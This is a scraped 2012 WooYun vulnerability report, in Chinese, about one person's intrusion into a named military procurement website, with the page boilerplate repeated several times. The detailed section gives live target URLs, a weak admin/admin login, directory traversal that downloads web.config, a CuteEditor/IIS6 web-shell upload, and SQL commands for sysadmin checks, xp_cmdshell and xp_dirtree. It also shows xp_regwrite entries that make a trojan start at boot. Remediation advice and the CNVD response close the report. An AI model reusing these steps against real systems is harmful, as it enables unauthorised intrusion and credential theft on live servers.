对XXXX.mil.cn军区某采购管理中心的检测

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-010596

漏洞标题：对XXXX.mil.cn军区某采购管理中心的检测

漏洞作者：数据流

提交时间：2012-08-05 18:53

修复时间：2012-09-19 18:54

公开时间：2012-09-19 18:54

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2012-08-05：细节已通知厂商并且等待厂商处理中
2012-08-09：厂商已经确认，细节仅向厂商公开
2012-08-19：细节向核心白帽子及相关领域专家公开
2012-08-29：细节向普通白帽子公开
2012-09-08：细节向实习白帽子公开
2012-09-19：细节向公众公开

简要描述：

还是无意中打开了这网站通过某网站的链接职业病就随手简单看了下..本次检测无进一步的权限提升谢绝跨省!!!

详细说明：

http://www.qjmbc.mil.cn/

后台:

http://www.qjmbc.mil.cn/admin/adminlogin.aspx

简单的看了下貌似没什么突破
又是独立服务器
扫了扫开房端口 8080开了
于是..

http://www.qjmbc.mil.cn:8080/

哈又一个军方网站
存在遍历目录漏洞

(如果不涉及到要看源码修改本地构造什么的我还是喜欢IE6入侵网站..觉得很方便很轻盈哈)
后台:

http://www.qjmbc.mil.cn:8080/admin/ALogin.aspx

弱密码 admin admin

能任意上传文件..可是找不到路径

http://www.qjmbc.mil.cn:8080/Xiazai.aspx?xzURL=20111111125527aspxspy.aspx

看到这个URL 就想到了任意文件下载漏洞

http://www.qjmbc.mil.cn:8080/Xiazai.aspx?xzURL=../web.config

MSSQL也是弱密码啊可惜是内网连接不到.
在后台发表文章发现是用CuteEditor,于是又多一个任意文件下载漏洞

http://www.qjmbc.mil.cn:8080/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config

CuteEditor上传漏洞过程简单说说新建一个XXX.ASP文件夹然后上传伪图片木马
利用IIS6解析..

以为权限都拿到了没想到服务器不支持fso

要传个aspx木马才有权限啊
于是找到了那个上传的路径

http://www.qjmbc.mil.cn:8080/images1/

发现我们传的马都是0b 应该是过滤了什么的吧先放弃传aspx马的思路
用刚才拿下的asp shell连接sa

SELECT IS_SRVROLEMEMBER('sysadmin')

拥有最高权限了
查看数据库就能进入刚才那个后台了那个后台应该能上传aspx的吧具体我没试了

EXEC master..xp_cmdshell 'set'

调用xp_cmdshell执行命令返回错误:

-2147467259:[Microsoft][ODBC SQL Server Driver][SQL Server]xpsql.cpp: 错误 5 来自 CreateProcess（第 675 行）

应该是对cmd的权限做了设置..所以执行不了

EXEC master..xp_dirtree 'C:\',1,1

任意盘符浏览
还有一思路在后台上传一个远控木马或提权exp什么的
加入启动项
mssql语句:

EXEC master..xp_regwrite HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows\CurrentVersion\Run','F','REG_SZ','xxx.exe'

EXEC master..xp_regwrite HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows\CurrentVersion\Run','F','REG_SZ','xxx/cmd.exe' /c copy或net 什么的

然后再用MS12020对服务器进行重启即可获得服务器权限
这一过程我不演示.(怕被跨省了)
检测结束了..

漏洞证明：

修复方案：

1:迅速修改所有后台口令
2:修改MSSQL的sa密码要复杂
3:清除webshell
4:修过CuteEditor路径
5:对xiazai.aspx进行严格审计修补漏洞
6:关闭IIS中目录浏览
7:谢绝和谐和跨省

版权声明：转载请注明来源数据流@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2012-08-09 23:09

厂商回复：

CNVD确认并复现所述过程，暂未建立直接处置渠道，尝试转交其域名注册管理方联系处置。
按完全影响机密性、可用性进行评分，rank=9.28*1.1*1.3=13.156

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-010596

漏洞标题：对XXXX.mil.cn军区某采购管理中心的检测

相关厂商：中国人民解放军

漏洞作者：数据流

提交时间：2012-08-05 18:53

修复时间：2012-09-19 18:54

公开时间：2012-09-19 18:54

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源数据流@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-010596

漏洞标题：对XXXX.mil.cn军区某采购管理中心的检测

相关厂商：中国人民解放军

漏洞作者： 数据流

提交时间：2012-08-05 18:53

修复时间：2012-09-19 18:54

公开时间：2012-09-19 18:54

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2012-010596"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 数据流@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：数据流

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源数据流@乌云